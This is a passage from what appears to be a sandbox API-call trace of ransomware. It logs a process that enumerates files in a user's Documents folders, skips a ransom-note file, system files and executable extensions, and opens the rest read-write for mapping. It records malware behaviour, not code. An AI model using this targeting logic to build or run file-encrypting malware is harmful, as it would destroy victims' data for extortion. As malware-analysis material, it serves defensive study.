HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\i4ouEKS0Y1j5q3bJi\\hvIpcfVk\\") returned 84 [0185.336] lstrlenW (lpString="0a16c9.tmp") returned 10 [0185.336] lstrcpyW (in: lpString1=0x36fe564, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\i4ouEKS0Y1j5q3bJi\\hvIpcfVk\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\i4ouEKS0Y1j5q3bJi\\hvIpcfVk\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\i4ouEKS0Y1j5q3bJi\\hvIpcfVk\\" [0185.337] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\i4ouEKS0Y1j5q3bJi\\hvIpcfVk\\", lpString2="0a16c9.tmp" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\i4ouEKS0Y1j5q3bJi\\hvIpcfVk\\0a16c9.tmp") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\i4ouEKS0Y1j5q3bJi\\hvIpcfVk\\0a16c9.tmp" [0185.337] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0185.337] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\i4ouEKS0Y1j5q3bJi\\hvIpcfVk\\0a16c9.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\s3f3ughxqbgggruc\\i4oueks0y1j5q3bji\\hvipcfvk\\0a16c9.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0185.337] CloseHandle (hObject=0x0) returned 0 [0185.337] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0185.337] FindNextFileW (in: hFindFile=0x479938, lpFindFileData=0x36fed94 | out: lpFindFileData=0x36fed94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe435c0d0, ftCreationTime.dwHighDateTime=0x1d4cbee, ftLastAccessTime.dwLowDateTime=0xf3618280, ftLastAccessTime.dwHighDateTime=0x1d4cbb5, ftLastWriteTime.dwLowDateTime=0xae8ee160, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x11cc0, dwReserved0=0x0, dwReserved1=0x0, cFileName="8x_O2ZZ-dI_F.rtf.hF16Ea", cAlternateFileName="8X_O2Z~1.HF1")) returned 1 [0185.337] lstrcmpiW (lpString1="8x_O2ZZ-dI_F.rtf.hF16Ea", lpString2="DECRYPT-FILES.txt") returned -1 [0185.337] lstrcmpiW (lpString1="8x_O2ZZ-dI_F.rtf.hF16Ea", lpString2="autorun.inf") returned -1 [0185.337] lstrcmpiW (lpString1="8x_O2ZZ-dI_F.rtf.hF16Ea", lpString2="boot.ini") returned -1 [0185.337] lstrcmpiW (lpString1="8x_O2ZZ-dI_F.rtf.hF16Ea", lpString2="desktop.ini") returned -1 [0185.337] lstrcmpiW (lpString1="8x_O2ZZ-dI_F.rtf.hF16Ea", lpString2="ntuser.dat") returned -1 [0185.337] lstrcmpiW (lpString1="8x_O2ZZ-dI_F.rtf.hF16Ea", lpString2="iconcache.db") returned -1 [0185.337] lstrcmpiW (lpString1="8x_O2ZZ-dI_F.rtf.hF16Ea", lpString2="bootsect.bak") returned -1 [0185.337] lstrcmpiW (lpString1="8x_O2ZZ-dI_F.rtf.hF16Ea", lpString2="ntuser.dat.log") returned -1 [0185.338] lstrcmpiW (lpString1="8x_O2ZZ-dI_F.rtf.hF16Ea", lpString2="thumbs.db") returned -1 [0185.338] lstrcmpiW (lpString1="8x_O2ZZ-dI_F.rtf.hF16Ea", lpString2="Bootfont.bin") returned -1 [0185.338] lstrlenW (lpString="8x_O2ZZ-dI_F.rtf.hF16Ea") returned 23 [0185.338] lstrcmpiW (lpString1="hF16Ea", lpString2="lnk") returned -1 [0185.338] lstrcmpiW (lpString1="hF16Ea", lpString2="exe") returned 1 [0185.338] lstrcmpiW (lpString1="hF16Ea", lpString2="sys") returned -1 [0185.338] lstrcmpiW (lpString1="hF16Ea", lpString2="dll") returned 1 [0185.338] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\i4ouEKS0Y1j5q3bJi\\hvIpcfVk\\") returned 84 [0185.338] lstrlenW (lpString="8x_O2ZZ-dI_F.rtf.hF16Ea") returned 23 [0185.338] lstrcpyW (in: lpString1=0x36fe564, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\i4ouEKS0Y1j5q3bJi\\hvIpcfVk\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\i4ouEKS0Y1j5q3bJi\\hvIpcfVk\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\i4ouEKS0Y1j5q3bJi\\hvIpcfVk\\" [0185.338] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\i4ouEKS0Y1j5q3bJi\\hvIpcfVk\\", lpString2="8x_O2ZZ-dI_F.rtf.hF16Ea" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\i4ouEKS0Y1j5q3bJi\\hvIpcfVk\\8x_O2ZZ-dI_F.rtf.hF16Ea") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\i4ouEKS0Y1j5q3bJi\\hvIpcfVk\\8x_O2ZZ-dI_F.rtf.hF16Ea" [0185.338] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0185.338] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\i4ouEKS0Y1j5q3bJi\\hvIpcfVk\\8x_O2ZZ-dI_F.rtf.hF16Ea" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\s3f3ughxqbgggruc\\i4oueks0y1j5q3bji\\hvipcfvk\\8x_o2zz-di_f.rtf.hf16ea"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x274 [0185.339] GetFileSizeEx (in: hFile=0x274, lpFileSize=0x36fdd30 | out: lpFileSize=0x36fdd30*=72896) returned 1 [0185.339] CreateFileMappingW (hFile=0x274, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x278 [0185.339] MapViewOfFile (hFileMappingObject=0x278, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x8a0000 [0185.340] UnmapViewOfFile (lpBaseAddress=0x8a0000) returned 1 [0185.340] CloseHandle (hObject=0x278) returned 1 [0185.340] CloseHandle (hObject=0x274) returned 1 [0185.340] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0185.340] FindNextFileW (in: hFindFile=0x479938, lpFindFileData=0x36fed94 | out: lpFindFileData=0x36fed94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd229c70, ftCreationTime.dwHighDateTime=0x1d4c7e4, ftLastAccessTime.dwLowDateTime=0xce74d10, ftLastAccessTime.dwHighDateTime=0x1d4cf77, ftLastWriteTime.dwLowDateTime=0xae93a420, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x672c, dwReserved0=0x0, dwReserved1=0x0, cFileName="Aoe1mfCdGbGnQ.csv.l8FrC1N", cAlternateFileName="AOE1MF~1.L8F")) returned 1 [0185.341] lstrcmpiW (lpString1="Aoe1mfCdGbGnQ.csv.l8FrC1N", lpString2="DECRYPT-FILES.txt") returned -1 [0185.341] lstrcmpiW (lpString1="Aoe1mfCdGbGnQ.csv.l8FrC1N", lpString2="autorun.inf") returned -1 [0185.341] lstrcmpiW (lpString1="Aoe1mfCdGbGnQ.csv.l8FrC1N", lpString2="boot.ini") returned -1 [0185.341] lstrcmpiW (lpString1="Aoe1mfCdGbGnQ.csv.l8FrC1N", lpString2="desktop.ini") returned -1 [0185.341] lstrcmpiW (lpString1="Aoe1mfCdGbGnQ.csv.l8FrC1N", lpString2="ntuser.dat") returned -1 [0185.341] lstrcmpiW (lpString1="Aoe1mfCdGbGnQ.csv.l8FrC1N", lpString2="iconcache.db") returned -1 [0185.341] lstrcmpiW (lpString1="Aoe1mfCdGbGnQ.csv.l8FrC1N", lpString2="bootsect.bak") returned -1 [0185.341] lstrcmpiW (lpString1="Aoe1mfCdGbGnQ.csv.l8FrC1N", lpString2="ntuser.dat.log") returned -1 [0185.341] lstrcmpiW (lpString1="Aoe1mfCdGbGnQ.csv.l8FrC1N", lpString2="thumbs.db") returned -1 [0185.341] lstrcmpiW (lpString1="Aoe1mfCdGbGnQ.csv.l8FrC1N", lpString2="Bootfont.bin") returned -1 [0185.341] lstrlenW (lpString="Aoe1mfCdGbGnQ.csv.l8FrC1N") returned 25 [0185.341] lstrcmpiW (lpString1="l8FrC1N", lpString2="lnk") returned -1 [0185.341] lstrcmpiW (lpString1="l8FrC1N", lpString2="exe") returned 1 [0185.341] lstrcmpiW (lpString1="l8FrC1N", lpString2="sys") returned -1 [0185.341] lstrcmpiW (lpString1="l8FrC1N", lpString2="dll") returned 1 [0185.341] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\i4ouEKS0Y1j5q3bJi\\hvIpcfVk\\") returned 84 [0185.341] lstrlenW (lpString="Aoe1mfCdGbGnQ.csv.l8FrC1N") returned 25 [0185.341] lstrcpyW (in: lpString1=0x36fe564, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\i4ouEKS0Y1j5q3bJi\\hvIpcfVk\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\i4ouEKS0Y1j5q3bJi\\hvIpcfVk\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\i4ouEKS0Y1j5q3bJi\\hvIpcfVk\\" [0185.341] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\i4ouEKS0Y1j5q3bJi\\hvIpcfVk\\", lpString2="Aoe1mfCdGbGnQ.csv.l8FrC1N" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\i4ouEKS0Y1j5q3bJi\\hvIpcfVk\\Aoe1mfCdGbGnQ.csv.l8FrC1N") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\i4ouEKS0Y1j5q3bJi\\hvIpcfVk\\Aoe1mfCdGbGnQ.csv.l8FrC1N" [0185.341] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0185.341] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\i4ouEKS0Y1j5q3bJi\\hvIpcfVk\\Aoe1mfCdGbGnQ.csv.l8FrC1N" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\s3f3ughxqbgggruc\\i4oueks0y1j5q3bji\\hvipcfvk\\aoe1mfcdgbgnq.csv.l8frc1n"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x274 [0185.342] GetFileSizeEx (in: hFile=0x274, lpFileSize=0x36fdd30 | out: lpFileSize=0x36fdd30*=26412) returned 1 [0185.342] CreateFileMappingW (hFile=0x274, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x278 [0185.342] MapViewOfFile (hFileMappingObject=0x278, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x8a0000 [0185.343] UnmapViewOfFile (lpBaseAddress=0x8a0000) returned 1 [0185.343] CloseHandle (hObject=0x278) returned 1 [0185.343] CloseHandle (hObject=0x274) returned 1 [0185.343] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0185.343] FindNextFileW (in: hFindFile=0x479938, lpFindFileData=0x36fed94 | out: lpFindFileData=0x36fed94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6f87c330, ftCreationTime.dwHighDateTime=0x1d4cf3d, ftLastAccessTime.dwLowDateTime=0x5561350, ftLastAccessTime.dwHighDateTime=0x1d4c5fa, ftLastWriteTime.dwLowDateTime=0xae9866e0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x2ef9, dwReserved0=0x0, dwReserved1=0x0, cFileName="AVwBYYGM.csv.xjQs", cAlternateFileName="AVWBYY~1.XJQ")) returned 1 [0185.343] lstrcmpiW (lpString1="AVwBYYGM.csv.xjQs", lpString2="DECRYPT-FILES.txt") returned -1 [0185.343] lstrcmpiW (lpString1="AVwBYYGM.csv.xjQs", lpString2="autorun.inf") returned 1 [0185.343] lstrcmpiW (lpString1="AVwBYYGM.csv.xjQs", lpString2="boot.ini") returned -1 [0185.343] lstrcmpiW (lpString1="AVwBYYGM.csv.xjQs", lpString2="desktop.ini") returned -1 [0185.343] lstrcmpiW (lpString1="AVwBYYGM.csv.xjQs", lpString2="ntuser.dat") returned -1 [0185.343] lstrcmpiW (lpString1="AVwBYYGM.csv.xjQs", lpString2="iconcache.db") returned -1 [0185.343] lstrcmpiW (lpString1="AVwBYYGM.csv.xjQs", lpString2="bootsect.bak") returned -1 [0185.343] lstrcmpiW (lpString1="AVwBYYGM.csv.xjQs", lpString2="ntuser.dat.log") returned -1 [0185.343] lstrcmpiW (lpString1="AVwBYYGM.csv.xjQs", lpString2="thumbs.db") returned -1 [0185.343] lstrcmpiW (lpString1="AVwBYYGM.csv.xjQs", lpString2="Bootfont.bin") returned -1 [0185.343] lstrlenW (lpString="AVwBYYGM.csv.xjQs") returned 17 [0185.343] lstrcmpiW (lpString1="xjQs", lpString2="lnk") returned 1 [0185.343] lstrcmpiW (lpString1="xjQs", lpString2="exe") returned 1 [0185.343] lstrcmpiW (lpString1="xjQs", lpString2="sys") returned 1 [0185.343] lstrcmpiW (lpString1="xjQs", lpString2="dll") returned 1 [0185.343] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\i4ouEKS0Y1j5q3bJi\\hvIpcfVk\\") returned 84 [0185.343] lstrlenW (lpString="AVwBYYGM.csv.xjQs") returned 17 [0185.343] lstrcpyW (in: lpString1=0x36fe564, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\i4ouEKS0Y1j5q3bJi\\hvIpcfVk\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\i4ouEKS0Y1j5q3bJi\\hvIpcfVk\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\i4ouEKS0Y1j5q3bJi\\hvIpcfVk\\" [0185.343] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\i4ouEKS0Y1j5q3bJi\\hvIpcfVk\\", lpString2="AVwBYYGM.csv.xjQs" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\i4ouEKS0Y1j5q3bJi\\hvIpcfVk\\AVwBYYGM.csv.xjQs") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\i4ouEKS0Y1j5q3bJi\\hvIpcfVk\\AVwBYYGM.csv.xjQs" [0185.343] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0185.344] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\i4ouEKS0Y1j5q3bJi\\hvIpcfVk\\AVwBYYGM.csv.xjQs" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\s3f3ughxqbgggruc\\i4oueks0y1j5q3bji\\hvipcfvk\\avwbyygm.csv.xjqs"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x274 [0185.344] GetFileSizeEx (in: hFile=0x274, lpFileSize=0x36fdd30 | out: lpFileSize=0x36fdd30*=12025) returned 1 [0185.344] CreateFileMappingW (hFile=0x274, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x278 [0185.344] MapViewOfFile (hFileMappingObject=0x278, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x8a0000 [0185.345] UnmapViewOfFile (lpBaseAddress=0x8a0000) returned 1 [0185.345] CloseHandle (hObject=0x278) returned 1 [0185.345] CloseHandle (hObject=0x274) returned 1 [0185.345] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0185.345] FindNextFileW (in: hFindFile=0x479938, lpFindFileData=0x36fed94 | out: lpFindFileData=0x36fed94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xae8ee160, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xae8ee160, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xae8ee160, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0185.345] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0185.345] FindNextFileW (in: hFindFile=0x479938, lpFindFileData=0x36fed94 | out: lpFindFileData=0x36fed94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd193a000, ftCreationTime.dwHighDateTime=0x1d4d41d, ftLastAccessTime.dwLowDateTime=0xa86e8710, ftLastAccessTime.dwHighDateTime=0x1d4ce48, ftLastWriteTime.dwLowDateTime=0xae9ac840, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x2c22, dwReserved0=0x0, dwReserved1=0x0, cFileName="XNO92 a6pPV izRss.pps.whiQb", cAlternateFileName="XNO92A~1.WHI")) returned 1 [0185.345] lstrcmpiW (lpString1="XNO92 a6pPV izRss.pps.whiQb", lpString2="DECRYPT-FILES.txt") returned 1 [0185.345] lstrcmpiW (lpString1="XNO92 a6pPV izRss.pps.whiQb", lpString2="autorun.inf") returned 1 [0185.345] lstrcmpiW (lpString1="XNO92 a6pPV izRss.pps.whiQb", lpString2="boot.ini") returned 1 [0185.345] lstrcmpiW (lpString1="XNO92 a6pPV izRss.pps.whiQb", lpString2="desktop.ini") returned 1 [0185.345] lstrcmpiW (lpString1="XNO92 a6pPV izRss.pps.whiQb", lpString2="ntuser.dat") returned 1 [0185.345] lstrcmpiW (lpString1="XNO92 a6pPV izRss.pps.whiQb", lpString2="iconcache.db") returned 1 [0185.345] lstrcmpiW (lpString1="XNO92 a6pPV izRss.pps.whiQb", lpString2="bootsect.bak") returned 1 [0185.345] lstrcmpiW (lpString1="XNO92 a6pPV izRss.pps.whiQb", lpString2="ntuser.dat.log") returned 1 [0185.345] lstrcmpiW (lpString1="XNO92 a6pPV izRss.pps.whiQb", lpString2="thumbs.db") returned 1 [0185.345] lstrcmpiW (lpString1="XNO92 a6pPV izRss.pps.whiQb", lpString2="Bootfont.bin") returned 1 [0185.346] lstrlenW (lpString="XNO92 a6pPV izRss.pps.whiQb") returned 27 [0185.346] lstrcmpiW (lpString1="whiQb", lpString2="lnk") returned 1 [0185.346] lstrcmpiW (lpString1="whiQb", lpString2="exe") returned 1 [0185.346] lstrcmpiW (lpString1="whiQb", lpString2="sys") returned 1 [0185.346] lstrcmpiW (lpString1="whiQb", lpString2="dll") returned 1 [0185.346] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\i4ouEKS0Y1j5q3bJi\\hvIpcfVk\\") returned 84 [0185.346] lstrlenW (lpString="XNO92 a6pPV izRss.pps.whiQb") returned 27 [0185.346] lstrcpyW (in: lpString1=0x36fe564, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\i4ouEKS0Y1j5q3bJi\\hvIpcfVk\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\i4ouEKS0Y1j5q3bJi\\hvIpcfVk\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\i4ouEKS0Y1j5q3bJi\\hvIpcfVk\\" [0185.346] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\i4ouEKS0Y1j5q3bJi\\hvIpcfVk\\", lpString2="XNO92 a6pPV izRss.pps.whiQb" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\i4ouEKS0Y1j5q3bJi\\hvIpcfVk\\XNO92 a6pPV izRss.pps.whiQb") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\i4ouEKS0Y1j5q3bJi\\hvIpcfVk\\XNO92 a6pPV izRss.pps.whiQb" [0185.346] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0185.346] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\i4ouEKS0Y1j5q3bJi\\hvIpcfVk\\XNO92 a6pPV izRss.pps.whiQb" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\s3f3ughxqbgggruc\\i4oueks0y1j5q3bji\\hvipcfvk\\xno92 a6ppv izrss.pps.whiqb"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x274 [0185.346] GetFileSizeEx (in: hFile=0x274, lpFileSize=0x36fdd30 | out: lpFileSize=0x36fdd30*=11298) returned 1 [0185.346] CreateFileMappingW (hFile=0x274, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x278 [0185.346] MapViewOfFile (hFileMappingObject=0x278, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x8a0000 [0185.347] UnmapViewOfFile (lpBaseAddress=0x8a0000) returned 1 [0185.347] CloseHandle (hObject=0x278) returned 1 [0185.347] CloseHandle (hObject=0x274) returned 1 [0185.347] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0185.348] FindNextFileW (in: hFindFile=0x479938, lpFindFileData=0x36fed94 | out: lpFindFileData=0x36fed94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd193a000, ftCreationTime.dwHighDateTime=0x1d4d41d, ftLastAccessTime.dwLowDateTime=0xa86e8710, ftLastAccessTime.dwHighDateTime=0x1d4ce48, ftLastWriteTime.dwLowDateTime=0xae9ac840, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x2c22, dwReserved0=0x0, dwReserved1=0x0, cFileName="XNO92 a6pPV izRss.pps.whiQb", cAlternateFileName="XNO92A~1.WHI")) returned 0 [0185.348] FindClose (in: hFindFile=0x479938 | out: hFindFile=0x479938) returned 1 [0185.348] CloseHandle (hObject=0x26c) returned 1 [0185.348] FindNextFileW (in: hFindFile=0x4798f8, lpFindFileData=0x36ff010 | out: lpFindFileData=0x36ff010*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xebc64ad0, ftCreationTime.dwHighDateTime=0x1d4cb45, ftLastAccessTime.dwLowDateTime=0x61349d70, ftLastAccessTime.dwHighDateTime=0x1d4cde5, ftLastWriteTime.dwLowDateTime=0xae9d29a0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x6847, dwReserved0=0x0, dwReserved1=0x0, cFileName="l16Gl4Lrs.rtf.2PdM3d", cAlternateFileName="L16GL4~1.2PD")) returned 1 [0185.348] lstrcmpiW (lpString1="l16Gl4Lrs.rtf.2PdM3d", lpString2="DECRYPT-FILES.txt") returned 1 [0185.348] lstrcmpiW (lpString1="l16Gl4Lrs.rtf.2PdM3d", lpString2="autorun.inf") returned 1 [0185.348] lstrcmpiW (lpString1="l16Gl4Lrs.rtf.2PdM3d", lpString2="boot.ini") returned 1 [0185.348] lstrcmpiW (lpString1="l16Gl4Lrs.rtf.2PdM3d", lpString2="desktop.ini") returned 1 [0185.348] lstrcmpiW (lpString1="l16Gl4Lrs.rtf.2PdM3d", lpString2="ntuser.dat") returned -1 [0185.348] lstrcmpiW (lpString1="l16Gl4Lrs.rtf.2PdM3d", lpString2="iconcache.db") returned 1 [0185.348] lstrcmpiW (lpString1="l16Gl4Lrs.rtf.2PdM3d", lpString2="bootsect.bak") returned 1 [0185.348] lstrcmpiW (lpString1="l16Gl4Lrs.rtf.2PdM3d", lpString2="ntuser.dat.log") returned -1 [0185.348] lstrcmpiW (lpString1="l16Gl4Lrs.rtf.2PdM3d", lpString2="thumbs.db") returned -1 [0185.348] lstrcmpiW (lpString1="l16Gl4Lrs.rtf.2PdM3d", lpString2="Bootfont.bin") returned 1 [0185.348] lstrlenW (lpString="l16Gl4Lrs.rtf.2PdM3d") returned 20 [0185.348] lstrcmpiW (lpString1="2PdM3d", lpString2="lnk") returned -1 [0185.348] lstrcmpiW (lpString1="2PdM3d", lpString2="exe") returned -1 [0185.348] lstrcmpiW (lpString1="2PdM3d", lpString2="sys") returned -1 [0185.348] lstrcmpiW (lpString1="2PdM3d", lpString2="dll") returned -1 [0185.348] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\i4ouEKS0Y1j5q3bJi\\") returned 75 [0185.348] lstrlenW (lpString="l16Gl4Lrs.rtf.2PdM3d") returned 20 [0185.348] lstrcpyW (in: lpString1=0x36fe7e0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\i4ouEKS0Y1j5q3bJi\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\i4ouEKS0Y1j5q3bJi\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\i4ouEKS0Y1j5q3bJi\\" [0185.348] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\i4ouEKS0Y1j5q3bJi\\", lpString2="l16Gl4Lrs.rtf.2PdM3d" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\i4ouEKS0Y1j5q3bJi\\l16Gl4Lrs.rtf.2PdM3d") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\i4ouEKS0Y1j5q3bJi\\l16Gl4Lrs.rtf.2PdM3d" [0185.348] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0185.349] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\i4ouEKS0Y1j5q3bJi\\l16Gl4Lrs.rtf.2PdM3d" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\s3f3ughxqbgggruc\\i4oueks0y1j5q3bji\\l16gl4lrs.rtf.2pdm3d"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 